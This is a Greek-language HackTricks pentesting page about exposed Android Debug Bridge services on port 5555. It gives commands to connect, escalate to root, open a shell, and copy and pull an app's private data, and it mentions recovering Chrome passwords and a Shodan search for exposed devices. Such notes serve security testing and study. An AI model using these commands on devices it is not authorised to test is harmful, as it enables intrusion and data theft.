5.7 KiB
5555 - Αποσφαλμάτωση Android
Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
- Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε The PEASS Family, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.
Βασικές Πληροφορίες
Από τα έγγραφα:
Το Android Debug Bridge (adb) είναι ένα ευέλικτο εργαλείο γραμμής εντολών που σας επιτρέπει να επικοινωνείτε με ένα συσκευή. Η εντολή adb διευκολύνει μια ποικιλία ενεργειών συσκευής, όπως εγκατάσταση και αποσφαλμάτωση εφαρμογών, και παρέχει πρόσβαση σε ένα Unix κέλυφος που μπορείτε να χρησιμοποιήσετε για να εκτελέσετε μια ποικιλία εντολών σε μια συσκευή.
Προεπιλεγμένη θύρα: 5555.
PORT STATE SERVICE VERSION
5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)
Σύνδεση
Εάν βρείτε την υπηρεσία ADB που εκτελείται σε ένα θύρα ενός συσκευής και μπορείτε να συνδεθείτε σε αυτήν, μπορείτε να αποκτήσετε ένα κέλυφος μέσα στο σύστημα:
adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell
Για περισσότερες εντολές ADB, ελέγξτε την ακόλουθη σελίδα:
{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}
Αντιγραφή δεδομένων εφαρμογής
Για να κατεβάσετε πλήρως τα δεδομένα μιας εφαρμογής, μπορείτε να:
# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"
Μπορείτε να χρησιμοποιήσετε αυτό το κόλπο για να ανακτήσετε ευαίσθητες πληροφορίες όπως οι κωδικοί πρόσβασης του Chrome. Για περισσότερες πληροφορίες σχετικά με αυτό, ελέγξτε τις πληροφορίες και τις αναφορές που παρέχονται εδώ.
Shodan
android debug bridge
Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
- Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF, ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.